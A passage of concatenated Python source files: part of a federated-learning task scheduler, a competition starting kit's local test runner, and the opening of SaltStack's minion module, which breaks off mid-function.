schedule_logger(task.f_job_id).info("sync task {} {} info to all party failed: \n{}".format(task.f_task_id, task.f_task_version, response))
return status_code, response
@classmethod
def sync_task_status(cls, job, task):
schedule_logger(task.f_job_id).info("task {} {} is {}, sync to all party".format(task.f_task_id, task.f_task_version, task.f_status))
status_code, response = cls.task_command(job=job, task=task, command=f"status/{task.f_status}")
if status_code == FederatedSchedulingStatusCode.SUCCESS:
schedule_logger(task.f_job_id).info("sync task {} {} status {} to all party success".format(task.f_task_id, task.f_task_version, task.f_status))
else:
schedule_logger(task.f_job_id).info("sync task {} {} status {} to all party failed: \n{}".format(task.f_task_id, task.f_task_version, task.f_status, response))
return status_code, response
@classmethod
def stop_task(cls, job, task, stop_status):
schedule_logger(task.f_job_id).info("try to stop task {} {}".format(task.f_task_id, task.f_task_version))
task.f_status = stop_status
status_code, response = cls.task_command(job=job, task=task, command="stop/{}".format(stop_status))
if status_code == FederatedSchedulingStatusCode.SUCCESS:
schedule_logger(job.f_job_id).info("stop task {} {} success".format(task.f_task_id, task.f_task_version))
else:
schedule_logger(job.f_job_id).info("stop task {} {} failed:\n{}".format(task.f_task_id, task.f_task_version, response))
return status_code, response
@classmethod
def clean_task(cls, job, task, content_type):
schedule_logger(task.f_job_id).info("try to clean task {} {} {}".format(task.f_task_id, task.f_task_version, content_type))
status_code, response = cls.task_command(job=job, task=task, command="clean/{}".format(content_type))
if status_code == FederatedSchedulingStatusCode.SUCCESS:
schedule_logger(job.f_job_id).info("clean task {} {} {} successfully".format(task.f_task_id, task.f_task_version, content_type))
else:
schedule_logger(job.f_job_id).info("clean task {} {} {} failed:\n{}".format(task.f_task_id, task.f_task_version, content_type, response))
return status_code, response
@classmethod
def task_command(cls, job: Job, task: Task, command, command_body=None, parallel=False, need_user=False):
msg = f"execute federated task {task.f_component_name} command({command})"
federated_response = {}
job_parameters = job.f_runtime_conf_on_party["job_parameters"]
tasks = JobSaver.query_task(task_id=task.f_task_id, only_latest=True)
threads = []
for task in tasks:
dest_role, dest_party_id = task.f_role, task.f_party_id
federated_response[dest_role] = federated_response.get(dest_role, {})
endpoint = f"/party/{task.f_job_id}/{task.f_component_name}/{task.f_task_id}/{task.f_task_version}/{dest_role}/{dest_party_id}/{command}"
if need_user:
command_body["user_id"] = job.f_user.get(dest_role, {}).get(str(dest_party_id), "")
schedule_logger(job.f_job_id).info(f'user:{job.f_user}, dest_role:{dest_role}, dest_party_id:{dest_party_id}')
schedule_logger(job.f_job_id).info(f'command_body: {command_body}')
args = (job.f_job_id, job.f_role, job.f_party_id, dest_role, dest_party_id, endpoint, command_body, job_parameters["federated_mode"], federated_response)
if parallel:
t = threading.Thread(target=cls.federated_command, args=args)
threads.append(t)
t.start()
else:
cls.federated_command(*args)
for thread in threads:
thread.join()
status_code, response = cls.return_federated_response(federated_response=federated_response)
if status_code == FederatedSchedulingStatusCode.SUCCESS:
schedule_logger(job.f_job_id).info(successful_log(msg))
else:
schedule_logger(job.f_job_id).error(failed_log(msg, detail=response))
return status_code, response
@classmethod
def federated_command(cls, job_id, src_role, src_party_id, dest_role, dest_party_id, endpoint, body, federated_mode, federated_response):
st = base_utils.current_timestamp()
schedule_logger(job_id).info(f"start sending {endpoint} federated command")
try:
response = federated_api(job_id=job_id,
method='POST',
endpoint=endpoint,
src_role=src_role,
src_party_id=src_party_id,
dest_party_id=dest_party_id,
json_body=body if body else {},
federated_mode=federated_mode)
except Exception as e:
schedule_logger(job_id=job_id).exception(e)
response = {
"retcode": RetCode.FEDERATED_ERROR,
"retmsg": "Federated schedule error, {}".format(e)
}
if response["retcode"] != RetCode.SUCCESS:
schedule_logger(job_id=job_id).warning("an error occurred while {} the job to role {} party {}: \n{}".format(
endpoint,
dest_role,
dest_party_id,
response["retmsg"]
))
federated_response[dest_role][dest_party_id] = response
et = base_utils.current_timestamp()
schedule_logger(job_id).info(f"send {endpoint} federated command use {et - st} ms")
@classmethod
def report_task_to_initiator(cls, task: Task):
"""
:param task:
:return:
"""
if task.f_role != task.f_initiator_role and task.f_party_id != task.f_initiator_party_id:
try:
response = federated_api(job_id=task.f_job_id,
method='POST',
endpoint='/initiator/{}/{}/{}/{}/{}/{}/report'.format(
task.f_job_id,
task.f_component_name,
task.f_task_id,
task.f_task_version,
task.f_role,
task.f_party_id),
src_party_id=task.f_party_id,
dest_party_id=task.f_initiator_party_id,
src_role=task.f_role,
json_body=task.to_human_model_dict(only_primary_with=cls.REPORT_TO_INITIATOR_FIELDS),
federated_mode=task.f_federated_mode)
except Exception as e:
schedule_logger(task.f_job_id).error(f"report task to initiator error: {e}")
return False
if response["retcode"] != RetCode.SUCCESS:
retmsg = response["retmsg"]
schedule_logger(task.f_job_id).error(f"report task to initiator error: {retmsg}")
return False
else:
return True
else:
return False
@classmethod
def tracker_command(cls, job, request_data, command, json_body=None):
job_parameters = job.f_runtime_conf_on_party["job_parameters"]
response = federated_api(job_id=str(request_data['job_id']),
method='POST',
endpoint='/tracker/{}/{}/{}/{}/{}'.format(
request_data['job_id'],
request_data['component_name'],
request_data['role'],
request_data['party_id'],
command),
src_party_id=job.f_party_id,
dest_party_id=request_data['party_id'],
src_role=job.f_role,
json_body=json_body if json_body else {},
federated_mode=job_parameters["federated_mode"])
return response
# Utils
@classmethod
def return_federated_response(cls, federated_response):
retcode_set = set()
for dest_role in federated_response.keys():
for party_id in federated_response[dest_role].keys():
retcode_set.add(federated_response[dest_role][party_id]["retcode"])
if len(retcode_set) == 1 and RetCode.SUCCESS in retcode_set:
federated_scheduling_status_code = FederatedSchedulingStatusCode.SUCCESS
elif RetCode.EXCEPTION_ERROR in retcode_set:
federated_scheduling_status_code = FederatedSchedulingStatusCode.ERROR
elif RetCode.SUCCESS in retcode_set:
federated_scheduling_status_code = FederatedSchedulingStatusCode.PARTIAL
else:
federated_scheduling_status_code = FederatedSchedulingStatusCode.FAILED
return federated_scheduling_status_code, federated_response
|
run_local_test.py
|
"""run local test in starting kit"""
# pylint: disable=logging-fstring-interpolation
import argparse
import logging
import os
from os.path import join, isdir
import shutil
from multiprocessing import Process
VERBOSITY_LEVEL = 'WARNING'
logging.basicConfig(
level=getattr(logging, VERBOSITY_LEVEL),
format='%(asctime)s %(levelname)s %(filename)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S'
)
def _here(*args):
here = os.path.dirname(os.path.realpath(__file__))
return os.path.join(here, *args)
def _ingestion_program(starting_kit_dir):
return join(starting_kit_dir, 'ingestion', 'ingestion.py')
def _scoring_program(starting_kit_dir):
return join(starting_kit_dir, 'scoring', 'score.py')
def remove_dir(output_dir):
"""Remove the directory `output_dir`.
This aims to clean existing output of last run of local test.
"""
if isdir(output_dir):
logging.info(
f"Cleaning existing output directory of last run: {output_dir}")
shutil.rmtree(output_dir)
def _clean(starting_kit_dir):
ingestion_output_dir = join(starting_kit_dir, 'sample_result_submission')
score_dir = os.path.join(starting_kit_dir, 'scoring_output')
remove_dir(ingestion_output_dir)
remove_dir(score_dir)
def run(dataset_dir, code_dir, seed):
"""run"""
# Current directory containing this script
starting_kit_dir = _here()
path_ingestion = _ingestion_program(starting_kit_dir)
path_scoring = _scoring_program(starting_kit_dir)
# Run ingestion and scoring at the same time
command_ingestion = (
'python '
# f'{path_ingestion} --dataset_dir={dataset_dir}/data '
f'{path_ingestion} --dataset_dir={dataset_dir}/train.data'
f' --code_dir={code_dir}'
f' --seed={seed}')
command_scoring = (
# f'python {path_scoring} --solution_dir={dataset_dir}/solution')
f'python {path_scoring} --solution_dir={dataset_dir}')
def run_ingestion():
os.system(command_ingestion)
def run_scoring():
os.system(command_scoring)
ingestion_process = Process(name='ingestion', target=run_ingestion)
scoring_process = Process(name='scoring', target=run_scoring)
_clean(starting_kit_dir)
ingestion_process.start()
scoring_process.start()
def _parse_args():
default_starting_kit_dir = _here()
default_dataset_dir = join(default_starting_kit_dir, 'data', 'demo')
default_code_dir = join(default_starting_kit_dir, 'code_submission')
parser = argparse.ArgumentParser()
parser.add_argument('--dataset_dir', type=str,
default=default_dataset_dir,
help="Directory storing the dataset, should contain"
"'data' and 'solution'")
parser.add_argument('--code_dir', type=str,
default=default_code_dir,
help="Directory storing the submission code "
"`model.py` and other necessary packages.")
parser.add_argument('--seed', type=int,
default=1234,
help="seed used for all packages")
args = parser.parse_args()
return args
def main():
"""main entry"""
args = _parse_args()
dataset_dir = args.dataset_dir
code_dir = args.code_dir
seed = args.seed
logging.info("#" * 50)
logging.info("Begin running local test using")
logging.info(f"code_dir = {code_dir}")
logging.info(f"dataset_dir = {dataset_dir}")
logging.info(f"seed = {seed}")
logging.info("#" * 50)
run(dataset_dir, code_dir, seed)
if __name__ == '__main__':
main()
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import
from __future__ import print_function
import copy
import errno
import fnmatch
import hashlib
import logging
import multiprocessing
import os
import re
import salt
import signal
import sys
import threading
import time
import traceback
import types
from random import randint, shuffle
from salt.ext.six.moves import range
# Import third party libs
try:
import zmq
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
# Import salt libs
from salt.exceptions import (
AuthenticationError, CommandExecutionError, CommandNotFoundError,
SaltInvocationError, SaltReqTimeoutError, SaltClientError,
SaltSystemExit, SaltSyndicMasterError
)
import salt.client
import salt.crypt
import salt.loader
import salt.payload
import salt.utils
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minion
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.ext.six import string_types
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
import salt.syspaths
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
ret['master_ip'] = '127.0.0.1'
except SaltSystemExit:
err = 'Master address: {0} could not be resolved. Invalid or unresolveable address.'.format(
opts.get('master', 'Unknown'))
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def get_proc_dir(cachedir):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
'''
fn_ = os.path.join(cachedir, 'proc')
if not os.path.isdir(fn_):
# proc_dir is not present, create it
os.makedirs(fn_)
return fn_
def parse_args_and_kwargs(func, args, data=None):
'''
Wrap load_args_and_kwargs
'''
salt.utils.warn_until(
'Boron',
'salt.minion.parse_args_and_kwargs() has been renamed to '
'salt.minion.load_args_and_kwargs(). Please change this function call '
'before the Boron release of Salt.'
)
return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_cli
# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Boron',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(iter(string_kwarg.keys())) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}'.format(arg))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in arg.items():
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}'.format(arg))
continue
else:
_args.append(arg)
if invalid_kwargs:
raise SaltInvocationError(
'The following keyword arguments are not valid: {0}'
.format(', '.join(invalid_kwargs))
)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in data.items():
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
class SMinion(object):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
self.opts = opts
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
if isinstance(self.opts['master'], list):
masters = self.opts['master']
if self.opts['random_master'] is True:
shuffle(masters)
for master in masters:
self.opts['master'] = master
self.opts.update(resolve_dns(opts))
try:
self.gen_modules()
break
except SaltClientError:
log.warning(('Attempted to authenticate with master '
'{0} and failed'.format(master)))
continue
else:
if self.opts['random_master'] is True:
log.warning('random_master is True but there is only one master specified. Ignoring.')
self.opts.update(resolve_dns(opts))
self.gen_modules(initial_load=True)
else:
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment']
).compile_pillar()
self.functions = salt.loader.minion_mods(self.opts, include_errors=True)
self.function_errors = self.functions['_errors']
self.functions.pop('_errors') # Keep the funcs clean
self.returners = salt.loader.returners(self.opts, self.functions)
self.states = salt.loader.states(self.opts, self.functions)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
def _init_context_and_poller(self):
self.context = zmq.Context()
self.poller = zmq.Poller()
def _prepare_minion_event_system(self):
# Prepare the minion event system
#
# Start with the publish socket
self._init_context_and_poller()
hash_type = getattr(hashlib, self.opts.get('hash_type', 'md5'))
# Only use the first 10 chars to keep longer hashes from exceeding the
# max socket path length.
id_hash = hash_type(self.opts['id']).hexdigest()[:10]
epub_sock_path = os.path.join(
self.opts['sock_dir'],
'minion_event_{0}_pub.ipc'.format(id_hash)
)
if os.path.exists(epub_sock_path):
os.unlink(epub_sock_path)
epull_sock_path = os.path.join(
self.opts['sock_dir'],
'minion_event_{0}_pull.ipc'.format(id_hash)
)
if os.path.exists(epull_sock_path):
os.unlink(epull_sock_path)
self.epub_sock = self.context.socket(zmq.PUB)
if self.opts.get('ipc_mode', '') == 'tcp':
epub_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts['tcp_pub_port']
)
epull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts['tcp_pull_port']
)
else:
epub_uri = 'ipc://{0}'.format(epub_sock_path)
salt.utils.zeromq.check_ipc_path_max_len(epub_uri)
epull_uri = 'ipc://{0}'.format(epull_sock_path)
salt.utils.zeromq.check_ipc_path_max_len(epull_uri)
log.debug(
'{0} PUB socket URI: {1}'.format(
self.__class__.__name__, epub_uri
)
)
log.debug(
'{0} PULL socket URI: {1}'.format(
self.__class__.__name__, epull_uri
)
)
# Check to make sure the sock_dir is available, create if not
default_minion_sock_dir = os.path.join(
salt.syspaths.SOCK_DIR,
'minion'
)
minion_sock_dir = self.opts.get('sock_dir', default_minion_sock_dir)
if not os.path.isdir(minion_sock_dir):
# Let's try to create the directory defined on the configuration
# file
try:
os.makedirs(minion_sock_dir, 0o755)
except OSError as exc:
log.error('Could not create SOCK_DIR: {0}'.format(exc))
# Let's not fail yet and try using the default path
if minion_sock_dir == default_minion_sock_dir:
# We're already trying the default system path, stop now!
raise
if not os.path.isdir(default_minion_sock_dir):
try:
os.makedirs(default_minion_sock_dir, 0o755)
except OSError as exc:
log.error('Could not create SOCK_DIR: {0}'.format(exc))
# Let's stop at this stage
raise
# Create the pull socket
self.epull_sock = self.context.socket(zmq.PULL)
# Securely bind the event sockets
if self.opts.get('ipc_mode', '') != 'tcp':
old_umask = os.umask(0o177)
try:
log.info('Starting pub socket on {0}'.format(epub_uri))
self.epub_sock.bind(epub_uri)
log.info('Starting pull socket on {0}'.format(epull_uri))
self.epull_sock.bind(epull_uri)
finally:
if self.opts.get('ipc_mode', '') != 'tcp':
os.umask(old_umask)
@staticmethod
def process_schedule(minion, loop_interval):
try:
minion.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None):
self.opts = salt.config.minion_config(opts['conf_file'])
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.functions = salt.loader.minion_mods(
self.opts,
whitelist=self.whitelist,
initial_load=initial_load)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts, self.functions)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
# timeout for one of the minions to auth with a master
MINION_CONNECT_TIMEOUT = 5
def __init__(self, opts):
super(MultiMinion, self).__init__(opts)
def minions(self):
'''
Return a dict of minion generators bound to the tune_in method
dict of master -> minion_mapping, the mapping contains:
opts: options used to create the minion
last: last auth attempt time
auth_wait: time to wait for next auth attempt
minion: minion object
generator: generator function (non-blocking tune_in)
'''
if not isinstance(self.opts['master'], list):
log.error(
'Attempting to start a multimaster system with one master')
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
ret = {}
for master in set(self.opts['master']):
s_opts = copy.copy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
ret[master] = {'opts': s_opts,
'last': time.time(),
'auth_wait': s_opts['acceptance_wait_time']}
try:
minion = Minion(s_opts, self.MINION_CONNECT_TIMEOUT, False)
ret[master]['minion'] = minion
ret[master]['generator'] = minion.tune_in_no_block()
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(master))
return ret
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._prepare_minion_event_system()
self.poller.register(self.epull_sock, zmq.POLLIN)
# Prepare the minion generators
minions = self.minions()
loop_interval = int(self.opts['loop_interval'])
auth_wait = self.opts['acceptance_wait_time']
max_wait = self.opts['acceptance_wait_time_max']
while True:
package = None
for minion in minions.values():
if isinstance(minion, dict):
minion = minion['minion']
if not hasattr(minion, 'schedule'):
continue
loop_interval = self.process_schedule(minion, loop_interval)
socks = dict(self.poller.poll(1))
if socks.get(self.epull_sock) == zmq.POLLIN:
try:
package = self.epull_sock.recv(zmq.NOBLOCK)
except Exception:
pass
masters = list(minions.keys())
shuffle(masters)
# Do stuff per minion that we have
for master in masters:
minion = minions[master]
# if we haven't connected yet, lets attempt some more.
# make sure to keep separate auth_wait times, since these
# are separate masters
if 'generator' not in minion:
if time.time() - minion['auth_wait'] > minion['last']:
minion['last'] = time.time()
if minion['auth_wait'] < max_wait:
minion['auth_wait'] += auth_wait
try:
t_minion = Minion(minion['opts'], self.MINION_CONNECT_TIMEOUT, False)
minions[master]['minion'] = t_minion
minions[master]['generator'] = t_minion.tune_in_no_block()
minions[master]['auth_wait'] = self.opts['acceptance_wait_time']
except SaltClientError:
log.error('Error while bring up minion for multi-master. Is master {0} responding?'.format(master))
continue
else:
continue
# run scheduled jobs if you have them
loop_interval = self.process_schedule(minion['minion'], loop_interval)
# if you have an event to handle, do it on a single minion
# (first one to not throw an exception)
if package:
# If we need to expand this, we may want to consider a specific header
# or another approach entirely.
if package.startswith('_minion_mine'):
for multi_minion in minions:
try:
minions[master]['minion'].handle_event(package)
except Exception:
pass
else:
try:
minion['minion'].handle_event(package)
package = None
self.epub_sock.send(package)
except Exception:
pass
# have the Minion class run anything it has to run
next(minion['generator'])
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True): # pylint: disable=W0231
'''
Pass in the options dict
'''
self._running = None
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')]
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup the of the opts grains, so we can log from the grains
# module
opts['grains'] = salt.loader.grains(opts)
# evaluate the master to connect to and authenticate with it
opts['master'] = self.eval_master(opts,
timeout,
safe)
self.opts['pillar'] = salt.pillar.get_pillar(
opts,
opts['grains'],
opts['id'],
opts['environment']
).compile_pillar()
self.functions, self.returners, self.function_errors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.proc_dir = get_proc_dir(opts['cachedir'])
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if 'mine.update' in self.functions:
log.info('Added mine.update to scheduler')
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': opts['mine_interval'],
'jid_include': True,
'maxrunning': 2
}
})
# add master_alive job if enabled
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master_ip': self.opts['master'],
'connected': True}
}
})
self.grains_cache = self.opts['grains']
# store your hexid to subscribe to zmq, hash since zmq filters are prefix
# matches this way we can avoid collisions
self.hexid = hashlib.sha1(self.opts['id']).hexdigest()
if 'proxy' in self.opts['pillar']:
log.debug('I am {0} and I need to start some proxies for {1}'.format(self.opts['id'],
self.opts['pillar']['proxy']))
for p in self.opts['pillar']['proxy']:
log.debug('Starting {0} proxy.'.format(p))
pid = os.fork()
if pid > 0:
continue
else:
proxyminion = salt.ProxyMinion()
proxyminion.start(self.opts['pillar']['proxy'][p])
self.clean_die(signal.SIGTERM, None)
else:
log.debug('I am {0} and I am not supposed to start any proxies. '
'(Likely not a problem)'.format(self.opts['id']))
# __init__() from MinionBase is called in Minion.eval_master()
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False):
'''
Evaluates and returns the current master address. In standard mode, just calls
authenticate() with the given master address.
With master_type=func evaluates the current master address from the given
module and then calls authenticate().
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to connect is used to authenticate() and
then returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# check if master_type was altered from its default
if opts['master_type'] != 'str':
# check for a valid keyword
if opts['master_type'] == 'func':
# split module and function and try loading the module
mod, fun = opts['master'].split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise TypeError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod + '.' + fun]()
except TypeError:
msg = ('Failed to evaluate master address from '
'module \'{0}\''.format(opts['master']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(master_mod))
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
shuffle(opts['master'])
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
log.info('Removing possibly failed master {0} from list of'
' masters'.format(opts['master']))
# create new list of master with the possibly failed one removed
opts['master'] = [x for x in opts['master_list'] if opts['master'] != x]
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
local_masters = copy.copy(opts['master'])
for master in local_masters:
opts['master'] = master
opts.update(resolve_dns(opts))
super(Minion, self).__init__(opts)
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in self.opts:
self.opts['master_list'] = local_masters
try:
if self.authenticate(timeout, safe) != 'full':
conn = True
break
except SaltClientError:
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
self.connected = False
msg = ('No master could be reached or all masters denied '
'the minions connection attempt.')
log.error(msg)
else:
self.connected = True
return opts['master']
# single master sign in
else:
opts.update(resolve_dns(opts))
super(Minion, self).__init__(opts)
if self.authenticate(timeout, safe) == 'full':
self.connected = False
msg = ('master {0} rejected the minions connection because too '
'many minions are already connected.'.format(opts['master']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
else:
self.connected = True
return opts['master']
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in self.opts.items():
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).get_memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh)
if self.opts.get('multimaster', False):
s_opts = copy.copy(self.opts)
functions = salt.loader.minion_mods(s_opts)
else:
functions = salt.loader.minion_mods(self.opts)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
return functions, returners, errors
def _fire_master(self, data=None, tag=None, events=None, pretag=None):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
channel = salt.transport.Channel.factory(self.opts)
try:
result = channel.send(load)
except Exception:
